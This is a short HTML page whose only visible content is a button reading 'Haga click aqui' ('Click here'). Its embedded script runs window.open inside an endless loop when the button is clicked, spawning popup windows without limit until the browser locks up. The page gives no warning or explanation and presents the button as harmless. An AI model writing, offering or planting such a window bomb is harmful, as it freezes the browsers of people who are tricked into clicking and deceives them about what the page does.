<!doctype html>
<html lang="en">
<head>
<title></title>
<meta charset="utf-8">
<script>
 	function repetitivo() {
		while(true){
			window.open('data:text/html;charset=utf-8,%3C!DOCTYPE%20HTML%20PUBLIC%20%22-'+
  '%2F%2FW3C%2F%2FDTD%20HTML%204.0%2F%2FEN%22%3E%0D%0A%3Chtml%20lang%3D%22en'+
  '%22%3E%0D%0A%3Chead%3E%3Ctitle%3EEmbedded%20Window%3C%2Ftitle%3E%3C%2Fhea'+
  'd%3E%0D%0A%3Cbody%3E%3Ch1%3E42%3C%2Fh1%3E%3C%2Fbody%3E%0D%0A%3C%2Fhtml%3E'+
  '%0D%0A','_blank','height=300,width=400');
		}
	}
 	window.onload = function() {
 		var botonRepeticion = document.getElementById("botonRepeticion");
 		botonRepeticion.onclick = repetitivo;
 	}
</script>
</head>
<body>
	<input type="button" value="Haga click aqui" id="botonRepeticion">
</body> 
</html>